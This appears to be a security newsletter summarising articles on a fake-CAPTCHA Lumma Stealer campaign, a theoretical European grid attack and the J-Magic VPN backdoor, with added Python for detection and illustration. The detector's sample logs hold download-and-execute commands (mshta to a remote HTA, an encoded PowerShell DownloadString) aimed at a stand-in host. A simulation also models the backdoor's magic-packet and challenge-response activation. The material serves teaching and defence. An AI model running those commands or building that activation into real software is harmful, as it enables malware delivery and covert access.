In this week's edition we keep things short, not because the articles are simple (quite the reverse) but because there are only three of them. That does not mean you won't learn anything; you will. Two of the three are technical and may take a second read before it all makes sense.
Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks
The article's title is a clear warning that any techie will heed. A non-technical person, however, might fall victim and unknowingly install malware on their computer. Reading this should prompt you and me to educate our families and friends about the threat. We might put it this way: ignore any website that instructs you to open an application on your computer or to paste a command into it. If you don't, attackers can steal your personal information.
From the article:
The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Run prompt in Windows that uses the native mshta.exe binary to download and execute an HTA file from a remote server.
It's worth noting that a previous iteration of this technique, widely known as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.
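To make the two variants described above concrete from the defender's side, here is an added example (not code from the article or from the researchers it cites) that flags both lures in process-creation telemetry: the current variant, where the Run dialog (parent explorer.exe) launches mshta.exe with a remote URL, and the earlier ClickFix variant, where powershell.exe runs a Base64-encoded script. The log lines, hostnames, paths and the encoded script are constructed for illustration and loosely modelled on Sysmon Event ID 1 fields; the field layout is an assumption, not a real product's format.

```python
"""Flag ClickFix-style launches in constructed Sysmon-like process logs."""
import base64
import re

# Constructed "key=value" process-creation lines (assumed layout, not a real
# product format). Hosts, paths and scripts are made up for illustration.
LOG_RE = re.compile(r'ParentImage=(\S+)\s+Image=(\S+)\s+CommandLine="(.*)"$')
URL_RE = re.compile(r'https?://\S+', re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by the Base64 blob
ENC_RE = re.compile(r'(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)',
                    re.IGNORECASE)


def ps_encode(script: str) -> str:
    """PowerShell -EncodedCommand expects Base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical payload for the older Base64-PowerShell variant.
ENCODED_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/p")'

SAMPLE_LOGS = [
    # 1. current variant: Run dialog (parent explorer.exe) -> mshta.exe -> remote HTA
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta.exe https://example.invalid/verify.hta"',
    # 2. older variant: Run dialog -> powershell.exe with an encoded script
    'ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'CommandLine="powershell -w hidden -enc {ps_encode(ENCODED_SCRIPT)}"',
    # 3. not flagged here: mshta.exe on a local file, not launched from the shell
    'ParentImage=C:\\Windows\\System32\\svchost.exe Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta.exe C:\\Windows\\Installer\\local.hta"',
    # 4. benign: an ordinary program launched from the shell
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe notes.txt"',
]


def parse(line: str):
    """Split one log line into parent, image and command line (None if malformed)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parent, image, cmdline = m.groups()
    return {"parent": parent, "image": image, "cmdline": cmdline}


def decode_encoded_command(cmdline: str):
    """Return the decoded PowerShell script if -enc/-EncodedCommand is present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Indicators matched by one process-creation event (empty list = clean)."""
    image, parent, cmd = _basename(event["image"]), _basename(event["parent"]), event["cmdline"]
    findings = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta-remote-hta")
    if image in ("powershell.exe", "pwsh.exe"):
        script = decode_encoded_command(cmd)
        if script is not None:
            findings.append("powershell-encoded")
            if URL_RE.search(script) or "downloadstring" in script.lower():
                findings.append("encoded-script-downloads")
    # explorer.exe as parent is consistent with a command pasted into Win+R
    if findings and parent == "explorer.exe":
        findings.append("parent-explorer")
    return findings


def scan(lines) -> dict:
    """Map log index -> findings for every line that matched an indicator."""
    hits = {}
    for i, line in enumerate(lines):
        event = parse(line)
        if event:
            findings = classify(event)
            if findings:
                hits[i] = findings
    return hits


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOGS).items():
        print(idx, findings)
```

Decoding the `-enc` blob before matching matters: the URL in the older variant never appears in the raw command line, so a rule that only greps the command line for `http` misses it. The local-HTA case (line 3) is left unflagged on purpose to show where a tuning decision sits; in an environment that never uses HTA files at all, any mshta.exe launch is worth an alert.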
Researchers say new attack could take down the European power grid
Based on the article, experts with knowledge of power grids doubt that such an attack is realistic. Nonetheless, it was interesting research, and if you have a minute or two, you may well find it so too.
From the article:
The researchers surveyed the grid to measure the capacity of power that small- and medium-sized renewable facilities could feed into the grid. They arrived at the estimate of 40 GW.
Combined with the 20 GW of load they theoretically can add, that amounted to an unbalanced capacity of 60 GW, enough to power roughly all of Germany.
They posited that a sudden change that added or ditched that amount of electricity from the grid all at once could create enough instability to take it down entirely.
Backdoor infecting VPNs used “magic packets” for stealth and security
The folks at Ars Technica dubbed the backdoor a completely invincible backdoor. After reading the article, you will not be surprised that the title is fitting. Here is a quick summary: the backdoor sits passively, watching ordinary TCP traffic for a "magic packet"; when it sees one, it responds with a challenge, and the initiating party can only answer correctly if it holds the secret key.
From the article:
The combination of targeting Junos OS routers that serve as a VPN gateway and deploying a passive listening in-memory only agent, makes this an interesting confluence of tradecraft worthy of further observation.
The researchers found J-Magic on VirusTotal and determined that it had run inside the networks of 36 organizations. They still don't know how the backdoor got installed.
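The activation flow summarised above (passive listener, magic packet, challenge, keyed response) is modelled in this added example, which is not code from the article, from Lumen Black Lotus Labs or from the J-Magic implant itself. The marker bytes, their offset in the payload, the reply format and the use of HMAC-SHA256 as the keyed challenge-response are all assumptions; the page only says that a secret key is needed to answer the challenge and does not describe the real implant's packet format or key scheme. The traffic is constructed inline.

```python
"""Model of a passive 'magic packet' backdoor with a keyed challenge-response."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Hypothetical trigger: a fixed marker at a fixed offset in the TCP payload.
MAGIC = b"\x13\x37MAGC"
MAGIC_OFFSET = 8


@dataclass
class Packet:
    src: str        # source address
    dst_port: int   # port the packet arrived on (the implant does not own it)
    payload: bytes


class PassiveListener:
    """Implant side: inspects traffic already arriving at the host and stays
    silent unless it sees the marker. It binds no port of its own."""

    def __init__(self, key: bytes):
        self._key = key
        self.pending = {}      # src -> outstanding challenge
        self.shells = set()    # sources that answered correctly
        self.seen = 0

    def observe(self, pkt: Packet):
        """Return a reply payload when the implant speaks, else None."""
        self.seen += 1
        if pkt.src in self.pending:
            return self._check_response(pkt)
        end = MAGIC_OFFSET + len(MAGIC)
        if len(pkt.payload) >= end and pkt.payload[MAGIC_OFFSET:end] == MAGIC:
            challenge = secrets.token_bytes(16)
            self.pending[pkt.src] = challenge
            return b"CHAL" + challenge
        return None  # ordinary traffic: no reply, nothing to fingerprint

    def _check_response(self, pkt: Packet):
        challenge = self.pending.pop(pkt.src)
        expected = hmac.new(self._key, challenge, hashlib.sha256).digest()
        if hmac.compare_digest(pkt.payload, expected):
            self.shells.add(pkt.src)
            return b"SHELL"   # stands in for handing the sender a shell
        return None           # wrong key: fail silently, just like no implant


def operator_response(key: bytes, reply: bytes) -> bytes:
    """Operator side: answer the challenge with the shared key (assumed HMAC scheme)."""
    if not reply.startswith(b"CHAL"):
        raise ValueError("not a challenge")
    return hmac.new(key, reply[4:], hashlib.sha256).digest()


def build_magic_packet(src: str, port: int = 443) -> Packet:
    """Looks like junk to anything not checking that exact offset."""
    return Packet(src, port, bytes(MAGIC_OFFSET) + MAGIC + bytes(20))


def run_scenario(implant_key: bytes, wrong_key: bytes) -> dict:
    """Constructed traffic: benign packets, a keyed operator, and a key-less probe."""
    listener = PassiveListener(implant_key)

    noise = [   # constructed benign traffic arriving at the same host
        Packet("198.51.100.7", 443, b"GET / HTTP/1.1\r\nHost: vpn.example\r\n\r\n"),
        Packet("198.51.100.8", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + bytes(40)),
    ]
    noise_replies = [listener.observe(p) for p in noise]

    operator = "203.0.113.5"   # holds the key
    challenge = listener.observe(build_magic_packet(operator))
    operator_reply = listener.observe(
        Packet(operator, 443, operator_response(implant_key, challenge)))

    probe = "203.0.113.9"      # knows the marker (e.g. replayed it) but not the key
    challenge2 = listener.observe(build_magic_packet(probe))
    probe_reply = listener.observe(
        Packet(probe, 443, operator_response(wrong_key, challenge2)))

    return {
        "noise_replies": noise_replies,
        "operator_reply": operator_reply,
        "probe_reply": probe_reply,
        "shells": sorted(listener.shells),
        "seen": listener.seen,
    }


if __name__ == "__main__":
    print(run_scenario(b"implant-secret", b"guess"))
```

Two properties of the model explain why the article treats this as stealthy: ordinary traffic gets no reply at all, so a port scan or banner grab of the router shows nothing extra, and a wrong answer to the challenge is also met with silence, so even someone who captured and replayed a magic packet cannot confirm the implant is there without the key.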
Credits
Cover photo by Debby Hudson on Unsplash.
That's it for this week, and I'll see you next time.